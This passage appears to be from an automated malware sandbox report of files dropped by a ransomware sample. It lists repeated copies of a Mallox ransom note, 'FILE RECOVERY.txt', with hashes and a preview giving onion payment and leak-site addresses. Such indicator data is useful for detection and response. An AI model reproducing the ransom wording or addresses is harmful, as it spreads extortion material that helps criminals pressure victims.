                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\AppCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetCookies\ESE\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
